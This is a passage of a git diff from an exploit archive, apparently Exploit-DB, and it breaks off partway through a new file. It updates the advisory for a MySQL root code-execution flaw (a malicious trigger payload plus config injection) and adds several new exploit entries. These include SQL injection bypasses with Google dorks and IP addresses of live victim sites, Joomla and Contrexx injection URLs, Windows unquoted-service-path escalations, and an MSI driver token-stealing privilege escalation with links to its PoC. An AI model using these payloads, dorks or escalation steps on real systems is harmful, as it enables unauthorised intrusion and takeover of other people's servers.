5.7.14 Remote Root Code Execution / Privilege Escalation (0day) + 5.6.32 + 5.5.51 MySQL clones are also affected, including: @@ -63,8 +67,6 @@ A successful exploitation could allow attackers to execute arbitrary code with root privileges which would then allow them to fully compromise the server on which an affected version of MySQL is running. -Official patches for the vulnerability are not available at this time for Oracle -MySQL server. The vulnerability can be exploited even if security modules SELinux and AppArmor are installed with default active policies for MySQL service on major Linux distributions. @@ -160,13 +162,16 @@ in a '[mysqld]' or '[mysqld_safe]' section. If an attacker managed to inject a path to their malicious library within the config, they would be able to preload an arbitrary library and thus execute -arbitrary code with root privileges when MySQL service is restarted (manually, -via a system update, package update, system reboot etc.) +arbitrary code with root privileges when MySQL service is restarted. +The restart could be triggered manually, via a system update, package update +(including an update of dependencies), system reboot etc.). +Attackers might also be able to speed up the server restart remotely by issuing +a SHUTDOWN SQL statement or 'shutdown' command via mysqladmin. In 2003 a vulnerability was disclosed in MySQL versions before 3.23.55 that allowed users to create mysql config files with a simple statement: -SELECT * INFO OUTFILE '/var/lib/mysql/my.cnf' +SELECT * INTO OUTFILE '/var/lib/mysql/my.cnf' The issue was fixed by refusing to load config files with world-writable permissions as these are the default permissions applied to files created @@ -183,11 +188,12 @@ successfully bypass current restrictions by abusing MySQL logging functions (available in every MySQL install by default) to achieve the following: 1) Inject malicious configuration into existing MySQL configuration files on -systems with weak/improper permissions (configs owned by/writable by mysql user). +systems with weak/improper permissions (configs owned by/writable by mysql user) +(SCENARIO 1). 2) Create new configuration files within a MySQL data directory (writable by MySQL by default) on _default_ MySQL installs without the need to rely on -improper config permisions. +improper config permissions (SCENARIO 2). 3) Attackers with only SELECT/FILE permissions can gain access to logging functions (normally only available to MySQL admin users) on all of the @@ -195,12 +201,59 @@ _default_ MySQL installations and thus be in position to add/modify MySQL config files. +Update (16/09/2016): +The proof of concept details below should be read closely as there have been +some misconceptions noticed on some security forums which incorrectly try +to lessen the severity of this vulnerability due to a lack of correct +understanding of the issues presented in this advisory. +It should be noted that: + +* SCENARIO 2 (point 2 above) is _independent_ of SCENARIO 1 (point 1 above). +I.e the config injection vulnerability which ultimately leads to loading +arbitrary malicious shared libraries CAN be exploited EVEN if there are NO +my.cnf config files with insecure permissions available on the system. +In other words, weak permissions are NOT a requirement for exploitation, and +the vulnerability CAN be exploit on affected DEFAULT PerconaDB/MariaDB/MySQL +installations with CORRECT permissions set on ALL my.cnf files available on +the system by default. +The SCENARIO 1 has only been presented as it makes the exploit code much +simpler and allows to explain the logging abuse/config injection vulnerability +without exposing default installations (SCENARIO 2) to an immediate risk. + +* The researcher has created a private working PoC that has not been shared +publicly which CAN successfully exploit SCENARIO 2 (default setup/no incorrect +permissions on any of the default my.cnf config files). As noted both in the +section below as well as in the current PoC exploit's comments, the current +PoC is limited. It has been purposefully limited to protect immediate +exploitation of default installations (no incorrect perms on my.cnf) and give +users time to react to the vulnerability. + +* A successful exploitation of SCENARIO 2 (no my.cnf available with weak perms) +leading to root privilege escalation/code execution can _ALSO_ (however is NOT a +requirement) be achieved by means of a (separate) vulnerability: CVE-2016-6663. +PoC has been created by the author of this advisory but not released publicly. + +* The logging facility CAN be accessed by standard users with SELECT/FILE +privileges only. I.e SUPER privilege is NOT required to create malicious triggers +which contain the malicious payload that grants the attacker access to the +logging facility DESPITE the LACK of administrative privileges. +This has been explained in the section below (see point 3 in the section below) +and proven in the current PoC in this advisory and can also be observed in the +replication steps (see VI. section) that show the attacker database account +permissions (the attacker DB account is NOT assigned SUPER permissions). + +* The exploitation requires a restart that could happen via a number of ways. +Attackers might also be able to speed up the server restart remotely by issuing +a SHUTDOWN SQL statement or 'shutdown' command via mysqladmin. + + V. PROOF OF CONCEPT ------------------------- 1) Inject malicious configuration into existing MySQL configuration files on systems with weak/improper permissions (configs owned by/writable by mysql user). +(SCENARIO 1) ~~~~~~~~~~~~~~~~~~~~~~~~~ MySQL configuration files are loaded from all supported locations and processed @@ -243,7 +296,7 @@ need only read access: shell> chown mysql /etc/my.cnf" -Moreover, there are also MySQL recipes for installation automatation software +Moreover, there are also MySQL recipes for installation automation software such as Chef that also provide users with vulnerable permissions on my.cnf config files. @@ -315,15 +368,16 @@ mysqld_safe will read the shared library path correctly and add it to the LD_PRELOAD environment variable before the startup of mysqld daemon. The preloaded library can then hook the libc fopen() calls and clean up the config before it is ever processed by mysqld daemon in order for it -to start up successfully. - +to start up successfully so that the compromise goes unnoticed by the +system administrators etc. ~~~~~~~~~~~~~~~~~~~~~~~~~ 2) Create new configuration files within a MySQL data directory (writable by MySQL by default) on _default_ MySQL installs without the need to rely on -improper config permisions. +improper config permissions. +(SCENARIO 2) Analysis of the mysqld_safe script has shown that in addition to the @@ -424,14 +478,15 @@ a valid [section] header with the message: error: Found option without preceding group in config file: /var/lib/mysql/my.cnf at line: 1 Fatal error in defaults handling. Program aborted -Further testing has however proved that it is possible to bypass this security -restriction as well but these will not be included in this advisory for the -time being. +Further testing has however proven that IT IS possible to bypass this security +restriction as well but this will not be included in this advisory/PoC for the +time being. -It is worth to note that attackers could use one of the other vulnerabilities discovered -by the author of this advisory which has been assigned a CVEID of CVE-2016-6662 and is -pending disclosure. The undisclosed vulnerability makes it easy for certain attackers to -create /var/lib/mysql/my.cnf file with arbitrary contents without the FILE privilege +It is worth to note that attackers could use one of the other vulnerabilities +discovered by the author of this advisory which has been assigned a CVEID of +CVE-2016-6663 and is pending disclosure. +The undisclosed vulnerability makes it easy for certain attackers to create +/var/lib/mysql/my.cnf file with arbitrary contents without the FILE privilege requirement. @@ -447,7 +502,8 @@ If attackers do not have administrative rights required to access logging settin and only have standard user privileges with the addition of FILE privilege then they could still gain the ability to write to / modify configuration files. -This could be achieved by writing a malicious trigger payload: +This could be achieved by writing a malicious trigger payload - a trigger +definition that is an _equivalent_ to the following statement: CREATE DEFINER=`root`@`localhost` TRIGGER appendToConf AFTER INSERT @@ -464,20 +520,26 @@ malloc_lib='/var/lib/mysql/mysql_hookandroot_lib.so' set global general_log = off; END; +into a trigger definition/configuration file (.TRG) of an actively used table +('active_table') with the use of a statement similar to: -into a trigger file of an actively used table ('active_table') with the -use of a statement similar to: +SELECT '...trigger_definition...' INTO DUMPFILE /var/lib/mysql/activedb/active_table.TRG' -SELECT '....trigger_code...' INTO DUMPFILE /var/lib/mysql/activedb/active_table.TRG' +Note that _only_ the above SELECT statement is required to write out the trigger +definition by abusing the power of FILE privilege. +The CREATE TRIGGER statement is _never_ executed and is not necessary. This +means that SUPER privilege is not necessary either. See the exploit code for +details. Such trigger will be loaded when tables get flushed. From this point on whenever an INSERT statement is invoked on the table, e.g: INSERT INTO `active_table` VALUES('xyz'); -The trigger's code will be executed with mysql root user privileges (see -'definer' above) and will thus let attacker to modify the general_log settings -despite the lack of administrative privileges on their standard account. +The trigger's code will be executed with mysql root/admin privileges (notice +'DEFINER' above) and will thus let attacker to modify the general_log settings +despite the lack of administrative/SUPER privileges through their user account +(with SELECT/FILE privileges only). ------------------ @@ -607,8 +669,9 @@ with open(hookandrootlib_path, 'rb') as f: content = f.read() hookandrootlib_hex = binascii.hexlify(content) -# Trigger payload that will elevate user privileges and sucessfully execute SET GLOBAL GENERAL_LOG -# Decoded payload (paths may differ): +# Trigger payload that will elevate user privileges and successfully execute SET GLOBAL GENERAL_LOG +# in spite of the lack of SUPER/admin privileges (attacker only needs SELECT/FILE privileges) +# Decoded payload (paths may differ) will look similar to: """ DELIMITER // CREATE DEFINER=`root`@`localhost` TRIGGER appendToConf @@ -905,6 +968,9 @@ For example, /etc/mysql/my.cnf on Debian: 3. Run the exploit as the attacker and restart mysql when exploit is done. +Note that attackers could be able to force this step remotely by +issuing a remote SHUTDOWN command/SQL statement. + As attacker: ~~~~~~~~ @@ -1002,7 +1068,6 @@ exit - VII. BUSINESS IMPACT ------------------------- @@ -1020,7 +1085,12 @@ Successful exploitation could gain a attacker a remote shell with root privilege which would allow them to fully compromise the remote system. If exploited, the malicious code would run as soon as MySQL daemon gets -restarted. MySQL service restart could happen for a number of reasons. +restarted. +As mentioned, the restart could be triggered manually, via a system update, +package update (including an update of dependencies), system reboot etc.). +Attackers might also be able to speed up the server restart remotely by issuing +a SHUTDOWN SQL statement or 'shutdown' command via mysqladmin. + VIII. SYSTEMS AFFECTED @@ -1032,7 +1102,8 @@ of this advisory. Some systems run MySQL via Systemd and provide direct startup path to mysqld daemon instead of using mysqld_safe wrapper script. These systems however are also at risk as mysqld_safe may be called on update by the installation scripts -or some other system services. +or some other system services. It could also be triggered manually by +administrators running mysqld_safe as a habit. Because the exploit only accesses files normally used by MySQL server ( such as the config), and the injected library is preloaded by mysqld_safe startup @@ -1048,16 +1119,16 @@ The vulnerability was reported to Oracle on 29th of July 2016 and triaged by the security team. It was also reported to the other affected vendors including PerconaDB and MariaDB. -The vulnerabilities were patched by PerconaDB and MariaDB vendors by the end of -30th of August. -During the course of the patching by these vendors the patches went into +The vulnerabilities were patched by PerconaDB and MariaDB vendors in all branches +by 30th of August. +During the course of the patching process by these vendors the patches went into public repositories and the fixed security issues were also mentioned in the new releases which could be noticed by malicious attackers. As over 40 days have passed since reporting the issues and patches were already -mentioned publicly, a decision was made to start disclosing vulnerabilities -(with limited PoC) to inform users about the risks before the vendor's next -CPU update that only happens at the end of October. +mentioned publicly (by Percona and MariaDB) , a decision was made to start +disclosing vulnerabilities (with limited PoC) to inform users about the risks +before the vendor's next CPU update (scheduled for 18th of October). No official patches or mitigations are available at this time from the vendor. As temporary mitigations, users should ensure that no mysql config files are @@ -1066,6 +1137,23 @@ use. These are by no means a complete solution and users should apply official vendor patches as soon as they become available. +Update (16/09/2016): +It has been found that the vendor silently (i.e. without notifing the researcher +via a direct communication despite the ongoing private communication via email, +nor via releasing an immediate public Security Alert to publicly announce the +critical fixes) released security patches for the CVE-2016-6662 vulnerability in +the following releases: + +https://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-15.html +https://dev.mysql.com/doc/relnotes/mysql/5.6/en/news-5-6-33.html +https://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-52.html + +which changes the vulnerable/exploitable version list to the following: + +MySQL <= 5.7.14 + 5.6.32 + 5.5.51 + X. REFERENCES ------------------------- @@ -1079,6 +1167,17 @@ http://legalhackers.com/exploits/0ldSQL_MySQL_RCE_exploit.py http://legalhackers.com/exploits/mysql_hookandroot_lib.c +MySQL releases containing security fixes: +https://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-52.html +https://dev.mysql.com/doc/relnotes/mysql/5.6/en/news-5-6-33.html +https://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-15.html +which can be downloaded from: +http://dev.mysql.com/downloads/mysql/ + +https://mariadb.org/mariadb-server-versions-remote-root-code-execution-vulnerability-cve-2016-6662/ + +https://security-tracker.debian.org/tracker/CVE-2016-6662 + https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6662 The old vulnerability fixed in MySQL version 3.23.55: @@ -1096,10 +1195,18 @@ XII. REVISION HISTORY ------------------------- 12.09.2016 - Advisory released publicly as 0day +16.09.2016 - Updated the IV section with important notes to clarify + misconceptions observed on some security forums. +16.09.2016 - Updated the IX section to add information about fixed releases + along with I and II sections to reflect these. +22.09.2016 - Updated V. 3) section and fixed some typos. +23.09.2016 - Added notes about potential use of SHUTDOWN command/SQL statement + that remote attackers could use in order to speed up the restart. XIII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no -responsibility for any damage caused by the use or misuse of this information. \ No newline at end of file +responsibility for any damage caused by the use or misuse of this information. + diff --git a/platforms/php/webapps/40285.txt b/platforms/php/webapps/40285.txt new file mode 100755 index 000000000..c1c31232f --- /dev/null +++ b/platforms/php/webapps/40285.txt @@ -0,0 +1,58 @@ +# Exploit Title: Ocomon 2.0: Acess administrative Bypass / Multiple Sql +Injection +# Google Dork: inurl:ocomon/index.php or intitle:Ocomon 2.0-RC6 +# Date: 2016.08.18 +# Exploit Author: Jonatas Fil a.k.a pwx +# Vendor Homepage: ninj4c0d3r.github.io +# Version: Latest 2.0RC6 +# Tested on: Linux And Windows +# CVE : CVE-2005-4664 + + +\xDetails: +======================================== +[Software] +- Ocomon + +[Bug Summary] +- Multiple SQL Injection (SQLi) + +[Impact] +- High + +[Affected Version] +- Latest 2.0RC6 +- Prior versions may also be affected +========================================= + + + +\x01- Search by dork in google + +Dorks: +inurl:ocomon/index.php or intitle:Ocomon 2.0-RC6 + + +\x02 - After, To find the victim, open the inspect element in admin page. + +\x03 - Look for the parameter: : : : , and return +valida() and delete the content, leaving blank. + +\x04 - After, Sign in using: "admin'or'" For Username and Password. + +\x05 - Finish!, You get acess in administrative page to the system. + + +-------------------------------------------- +\xDEMO: + +http://200.66.111.38/ocomon/index.php +http://191.241.229.210:8080/ocomon/index.php +http://191.241.229.210:8081/ocomon/index.php +--------------------------------------------- + +References: + +https://packetstormsecurity.com/files/100568/Ocomon-2.0RC6-SQL-Injection.html +http://www.cvedetails.com/cve/CVE-2005-4664/ +http://www.securityfocus.com/bid/15386/exploit diff --git a/platforms/php/webapps/40366.txt b/platforms/php/webapps/40366.txt new file mode 100755 index 000000000..4549ab66f --- /dev/null +++ b/platforms/php/webapps/40366.txt @@ -0,0 +1,11 @@ +# Exploit Title: Contrexx CMS:egov moudle SQL injection +# Google Dork: inurl:?section=egov +# Date: 12/9/2016 +# Exploit Author: hamidreza borghei +# Software Link: https://www.cloudrexx.com/de/index.php?section=downloads&cmd=7&category=8 +# Version: 1.0.0 +# Tested on: linux + +sql injection in id parameter: + +http://server/index.php?section=egov&cmd=details&id=[sql query] \ No newline at end of file diff --git a/platforms/php/webapps/40390.php b/platforms/php/webapps/40390.php new file mode 100755 index 000000000..a4d5fb378 --- /dev/null +++ b/platforms/php/webapps/40390.php @@ -0,0 +1,28 @@ + + + + + + + + + + diff --git a/platforms/php/webapps/40423.txt b/platforms/php/webapps/40423.txt new file mode 100755 index 000000000..fd8a5b3d7 --- /dev/null +++ b/platforms/php/webapps/40423.txt @@ -0,0 +1,23 @@ +###################### +# Exploit Title : Joomla Event Booking Component - SQL Injection +# Exploit Author : Persian Hack Team +# Homepage : http://persian-team.ir +# Vendor Homepage : http://extensions.joomla.org/extension/event-booking +# Category [ Webapps ] +# Tested on [ Win ] +# Version : 2.10.1 +# Date 2016/09/25 +###################### +# +# PoC +# => Sql Injection : +# Date Parameter Vulnerable To SQL +# Demo : +# http://server/index.php?option=com_eventbooking&view=calendar&layout=weekly&date={SQL}&Itemid=354 +# +# Video : http://persian-team.ir/showthread.php?tid=160&pid=291 +###################### +# Discovered by : Mojtaba MobhaM +# B3li3v3 M3 I will n3v3r St0p +# Greetz : T3NZOG4N & FireKernel & Dr.Askarzade & Masood Ostad & Dr.Koorangi & Milad Hacking & JOK3R $ Mr_Mask_Black And All Persian Hack Team Members +###################### \ No newline at end of file diff --git a/platforms/windows/local/18500.py b/platforms/windows/local/18500.py index b1fe22c8f..ad4d2afa8 100755 --- a/platforms/windows/local/18500.py +++ b/platforms/windows/local/18500.py @@ -5,7 +5,7 @@ # Author: b33f (Ruben Boonen) - http://www.fuzzysecurity.com # # http://www.fuzzysecurity.com/exploits/8.html # # OS: WinXP PRO SP3 # -# Software: http://www.exploit-db.com/wp-content/themes/exploit/applications/ # +# Software: https://www.exploit-db.com/apps/ # # f248239d09b37400e8269cb1347c240e-BladeAPIMonitor-3.6.9.2.Setup.exe # # # # Unicode Exploit by FullMetalFouad - http://www.exploit-db.com/exploits/18349/ # diff --git a/platforms/windows/local/19776.pl b/platforms/windows/local/19776.pl index f1e89fbe9..543c09a52 100755 --- a/platforms/windows/local/19776.pl +++ b/platforms/windows/local/19776.pl @@ -5,8 +5,8 @@ # Author: b33f - http://www.fuzzysecurity.com/ # # OS: Windows XP SP1 # # DOS POC: C4SS!0 G0M3S => http://www.exploit-db.com/exploits/17512/ # -# Software: http://www.exploit-db.com/wp-content/themes/exploit/ # -# applications/decbc54ffcf644e780a3ef4fcdd27093-zipitfastnow.exe # +# Software: https://www.exploit-db.com/apps/ # +# decbc54ffcf644e780a3ef4fcdd27093-zipitfastnow.exe # #---------------------------------------------------------------------------# # Sorry for reinventing the wheel but learning about heap-overflows # # requires you to take a step back and roll with the punches not unlike # diff --git a/platforms/windows/local/32358.pl b/platforms/windows/local/32358.pl index 1877c8f67..dca61ec64 100755 --- a/platforms/windows/local/32358.pl +++ b/platforms/windows/local/32358.pl @@ -2,7 +2,7 @@ # Date: 18 March 2014 # Exploit Author: Ayman Sagy # Vendor Homepage: http://ibiblio.org/mp3info/ -# Software Link: http://www.exploit-db.com/wp-content/themes/exploit/applications/cb7b619a10a40aaac2113b87bb2b2ea2-mp3info-0.8.5a.tgz +# Software Link: https://www.exploit-db.com/apps/cb7b619a10a40aaac2113b87bb2b2ea2-mp3info-0.8.5a.tgz # Version: MP3Info 0.8.5 # Tested on: Windows 7 Ultimate 64 and 32 bit # CVE : 2006-2465 diff --git a/platforms/windows/local/40422.txt b/platforms/windows/local/40422.txt new file mode 100755 index 000000000..ebf2fc2e3 --- /dev/null +++ b/platforms/windows/local/40422.txt @@ -0,0 +1,43 @@ +# Exploit Title: NetDrive 2.6.12 Unquoted Service Path Elevation of Privilege +# Date: 24/09/2016 +# Exploit Author: Tulpa +# Contact: tulpa@tulpa-security.com +# Author website: www.tulpa-security.com +# Vendor Homepage: http://www.netdrive.net/ +# Software Link: http://www.netdrive.net/download +# Version: 2.6.12 +# Tested on: Windows 7 x86 +# Shout-out to carbonated and ozzie_offsec + +1. Description: + +NetDrive installs a service with an unquoted service path running with SYSTEM privileges. +This could potentially allow an authorized but non-privileged local +user to execute arbitrary code with elevated privileges on the system. + +2. Proof + +C:\>sc qc Netdrive2_Service_Netdrive2 +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: Netdrive2_Service_Netdrive2 + TYPE : 110 WIN32_OWN_PROCESS (interactive) + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\NetDrive2\nd2svc.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : NetDrive2_Service_NetDrive2 + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + + + +3. Exploit: + +A successful attempt would require the local user to be able to insert their +code in the system root path undetected by the OS or other security applications +where it could potentially be executed during application startup or reboot. +If successful, the local user's code would execute with the elevated privileges +of the application. + diff --git a/platforms/windows/local/40425.txt b/platforms/windows/local/40425.txt new file mode 100755 index 000000000..461b417d6 --- /dev/null +++ b/platforms/windows/local/40425.txt @@ -0,0 +1,27 @@ +# Exploit Title: Elantech Smart-Pad Unquoted Service Path Privilege Escalation +# Date: 24/09/2016 +# Exploit Author: zaeek@protonmail.com +# Vendor Homepage: http://www.emc.com.tw/eng/ +# Version: 11.9.0.0 +# Tested on: Windows 7 64bit + +====Description==== + +Elantech Smart-Pad Service lacks of quotes in the filepath, causing it to be a potential vector of privilege escalation attack. +To properly exploit this vulnerability, the local attacker must insert an executable file in the path of the service. Upon service restart or system reboot, the malicious code will be run with elevated privileges. + +====Proof-of-Concept==== + +C:\>sc qc ETDService +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: ETDService +TYPE : 10 WIN32_OWN_PROCESS +START_TYPE : 2 AUTO_START +ERROR_CONTROL : 1 NORMAL +BINARY_PATH_NAME : C:\Program Files\Elantech\ETDService.exe +LOAD_ORDER_GROUP : +TAG : 0 +DISPLAY_NAME : Elan Service +DEPENDENCIES : +SERVICE_START_NAME : LocalSystem \ No newline at end of file diff --git a/platforms/windows/local/40426.txt b/platforms/windows/local/40426.txt new file mode 100755 index 000000000..906c4f5a8 --- /dev/null +++ b/platforms/windows/local/40426.txt @@ -0,0 +1,93 @@ +#Exploit Title: MSI NTIOLib.sys, WinIO.sys local privilege escalation +#Date: 2016-09-26 +#Exploit Author: ReWolf +#Vendor Homepage: http://www.msi.com +#Version: too many +#Tested on: Windows 10 x64 (TH2, RS1) + +Full description: http://blog.rewolf.pl/blog/?p=1630 +Exploit github repo: https://github.com/rwfpl/rewolf-msi-exploit + +EDB PoC Mirror: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40426.zip + +NTIOLib.sys is installed with a few different MSI utilities that are part of the software package for MSI motherboards and graphic cards. WinIO.sys is completely different driver and is installed with Dragon Gaming Center application, which is part of the software package for MSI notebooks. Since both drivers expose physical memory access to the unprivileged users, I decided to put it into one report (I’ll describe the technical differences later). Actually when I was verifying list of affected software, I’ve found third driver that is doing exactly the same thing, just have a bit different interface and name (RTCore32.sys / RTCore64.sys). + +Affected software: + + NTIOLib.sys / NTIOLib_X64.sys + MSI FastBoot + MSI Command Center + MSI Live Update + MSI Gaming APP + MSI Super Charger + MSI Dragon Center + WinIO.sys / WinIO64.sys + MSI Dragon Gaming Center + MSI Dragon Center + RTCore32.sys / RTCore64.sys + MSI Afterburner + +NTIOLib functionality exposed through IOCTLs: + + read/write physical memory (using MmMapIoSpace) + read write MSR registers (using rdmsr/wrmsr opcodes) + read PMC register (using rdpmc opcode) + in/out port operations + HalGetBusDataByOffset / HalSetBusDataByOffset + +WinIO functionality exposed through IOCTLs: + + read/write physical memory (ZwMapViewOfSection of “\\Device\\PhysicalMemory”) + in/out port operations + +RTCore functionality exposed through IOCTLs: + + read/write physical memory (ZwMapViewOfSection of “\\Device\\PhysicalMemory”) + read write MSR registers (using rdmsr/wrmsr opcodes) + in/out port operations + HalGetBusDataByOffset / HalSetBusDataByOffset + +It appears that RTCore driver is kind of hybrid between NTIOLib and WinIO. It’s also worth noting that WinIO driver is just compiled (and signed by MSI) version of the code that can be found here: http://www.internals.com/utilities_main.htm. + +UPDATE: RTCore driver is part of RivaTuner software, so all OEM branded RivaTuner clones are vulnerable (https://twitter.com/equilibriumuk/status/780367990160326656). + +Some of the mentioned applications load vulnerable driver on demand, but some of them loads the driver with service startup and keeps it loaded for the whole time, thus exploitation is rather trivial. I haven’t thoroughly inspected all MSI applications, since it’s not really possible (different version of the software for different hardware, multiple installers etc), so it’s very probable that my list doesn’t cover all cases. Generally if someone owns any MSI hardware, it’s good to check if any of above drivers (or with similar name) is loaded, and if yes, just remove the application that installed it. + +Disclosure timeline: +30.05.2016 sent e-mail notification to the addresses: security@msi.com, secure@msi.com, bugs@msi.com (none of those is valid, but it was worth trying) +31.05.2016 – 03.06.2016 tried reporting through official support channel, without any luck, final reply: + + Please don’t worry about it and the software files are secure.Anyway,we will send the information to relative department.Thanks! + +03.06.2016 tried contact through a friend from security team of some super-secret big corporation – also without luck +26.09.2016 full disclosure + +Technical details & PoC + +After ASMMAP disclosure, I’ve read that the exploitation of this kind of vulnerability is rather easy: + + This can be done by scanning for EPROCESS structures within memory and identifying one, then jumping through the linked list to find your target process and a known SYSTEM process (e.g. lsass), then duplicating the Token field across to elevate your process. This part isn’t really that novel or interesting, so I won’t go into it here. + +Since I don’t have much experience in this area, I decided to try above method and see if the exploitation is really straightforward. I’ve started randomly poking with physical pages, just to see how it behaves. My first observation was, that the WinIO driver is a lot more stable than NTIOLib, it probably stems from the method that is used to expose physical memory to the user application (MmMapIoSpace vs ZwMapViewOfSection). NTIOLib tends to BSODs sometimes, especially if the accessed addresses are random (aligned to the 0x1000). My second observation was, that NTIOLib becomes quite stable if the memory is accessed sequentially (page by page). This is actually good, because EPROCESS search is sequential activity. + +EPROCESS structures are allocated with Proc pool tag, this is the first indicator that EPROCESS search algorithm will look for. Each memory chunk starts with POOL_HEADER structure, followed by a few OBJECT_HEADER_xxx_INFO structures and finally by the OBJECT_HEADER. OBJECT_HEADER.Body is the actual EPROCESS. More details can be found in Uninformed Journal or in WRK (ObpAllocateObject, \wrk\base\ntos\ob\obcreate.c). On Windows 10 x64 (TH2, RS1) all those structures sums up to 0x80 bytes. To successfully execute local privilege escalation, I need to locate EPROCESS structure of 2 processes. One will be some system process and the second should be the process that privileges are supposed to be escalated. For system process I chose wininit.exe, and the escalated process will be the current process. Having names and PIDs of chosen processes, exploit can proceed to final EPROCESS verification (checks of UniqueProcessId and ImageFileName fields). + +With above information it is possible to test initial exploit – it is very slow, so slow that I haven’t wait till it finish. The slowdown comes from accessing addresses that are reserved for hardware IO devices. Those reserved memory ranges will vary from one machine to another, so it’s required to find them out and skip during EPROCESS search. The easiest method to get those ranges is calling NtQuerySystemInformation with SuperfetchInformationClass (http://www.alex-ionescu.com/?p=51), however this call requires elevation, so it has no use in this case. Second place where this information can be obtained is WMI (CIMV2, Win32_DeviceMemoryAddress). This method is not as accurate as SuperfetchInformationClass, but I decided to use it in my PoC. Information returned on VMware test system were 100% accurate, and the slowdown disappeared, however I was still experiencing slowdown on my host machine. I come up with really simple and ugly solution: I’ve added hardcoded <0xF0000000-0xFFFFFFFF> region to the ranges returned from WMI. At this point PoC successfully runs on both VMware test machine (Win10 x64 TH2) and my host machine (Win10 x64 RS1): + + Whoami: secret\user + Found wininit.exe PID: 000002D8 + Looking for wininit.exe EPROCESS... + EPROCESS: wininit.exe, token: FFFF8A06105A006B, PID: 2D8 + Stealing token... + Stolen token: FFFF8A06105A006B + Looking for MsiExploit.exe EPROCESS... + EPROCESS: MsiExploit.exe, token: FFFF8A0642E3B957, PID: CAA8 + Reusing token... + Whoami: nt authority\system + +Over-engineered version of PoC can be found on github (Visual Studio 2015 recommended): + +https://github.com/rwfpl/rewolf-msi-exploit + +It has hard-coded EPROCESS field offsets, so it only works on Win10 x64 TH2/RS1. PoC should work with any version of NTIOLib and WinIO drivers. I haven’t fully analyzed RTCore interface due to the fact, that I found it just today, so obviously it is not included in PoC. \ No newline at end of file diff --git a/platforms/windows/local/40427.txt b/platforms/windows/local/40427.txt new file mode 100755 index 000000000..eb522adc4 --- /dev/null +++ b/platforms/windows/local/40427.txt @@ -0,0 +1,41 @@ +# Exploit Title: Iperius Remote 1.7.0 Unquoted Service Path Elevation of Privilege +# Date: 26/09/2016 +# Exploit Author: Tulpa +# Contact: tulpa@tulpa-security.com +# Author website: www.tulpa-security.com +# Vendor Homepage: http://www.iperiusremote.com +# Software Link: https://www.iperiusremote.com/download.aspx +# Version: Software Version 1.7.0 +# Tested on: Windows 7 x86 +# Shout-out to carbonated and ozzie_offsec + +1. Description: + +Iperius Remote allows the user to install the application as a service with an unquoted service path running with SYSTEM privileges. It is important to note that the application installs itself as a service in the same location where the setup file in ran from. Provided that the end user initiates the installation from a directory with spaces in it's path, this could allow an authorized but non-privileged local +user to execute arbitrary code with elevated privileges on the system. + +2. Proof + +C:\>sc qc IperiusRemotesvc +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: IperiusRemotesvc + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Random Folder With Spaces\IperiusRemote.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : IperiusRemote Service + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + + +3. Exploit: + +A successful attempt would require the local user to be able to insert their +code in the system path undetected by the OS or other security applications +where it could potentially be executed during application startup or reboot. +If successful, the local user's code would execute with the elevated privileges +of the application. + diff --git a/platforms/windows/local/40428.txt b/platforms/windows/local/40428.txt new file mode 100755 index 000000000..3ec011686 --- /dev/null +++ b/platforms/windows/local/40428.txt @@ -0,0 +1,62 @@ +# Exploit Title: Macro Expert 4.0 Multiple Elevation of Privilege +# Date: 26/09/2016 +# Exploit Author: Tulpa +# Contact: tulpa@tulpa-security.com +# Author website: www.tulpa-security.com +# Vendor Homepage: http://www.macro-expert.com/ +# Software Link: http://www.macro-expert.com/download.htm +# Version: Software Version 4.0 +# Tested on: Windows 7 x86 +# Shout-out to carbonated and ozzie_offsec + +1. Description: + Macro Expert installs as a service with an unquoted service path running with SYSTEM + +privileges. This could potentially allow an authorized but non-privileged local +user to execute arbitrary code with elevated privileges on the system. Additionally the + +default installation path suffers from weak folder permission which an unauthorized user + +in the BUILTIN\Users group could take advantage of. + +2. Proof + +C:\Program Files\GrassSoft>sc qc "Macro Expert" +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: Macro Expert + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : c:\program files\grasssoft\macro expert\MacroService.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Macro Expert + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +C:\Program Files\GrassSoft>cacls "Macro Expert" +C:\Program Files\GrassSoft\Macro Expert BUILTIN\Users:(OI)(CI)C + NT SERVICE\TrustedInstaller:(ID)F + NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F + NT AUTHORITY\SYSTEM:(ID)F + NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F + BUILTIN\Administrators:(ID)F + BUILTIN\Administrators:(OI)(CI)(IO)(ID)F + BUILTIN\Users:(ID)R + BUILTIN\Users:(OI)(CI)(IO)(ID)(special access:) + GENERIC_READ + + GENERIC_EXECUTE + + CREATOR OWNER:(OI)(CI)(IO)(ID)F + + +3. Exploit: + +A successful attempt would require the local user to be able to insert their +code in the system root path undetected by the OS or other security applications +where it could potentially be executed during application startup or reboot. +If successful, the local user's code would execute with the elevated privileges +of the application. + diff --git a/platforms/windows/local/40429.cs b/platforms/windows/local/40429.cs new file mode 100755 index 000000000..97722bddf --- /dev/null +++ b/platforms/windows/local/40429.cs @@ -0,0 +1,488 @@ +/* +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=865 + +Windows: NtLoadKeyEx User Hive Attachment Point EoP +Platform: Windows 10 10586 (32/64) and 8.1 Update 2, 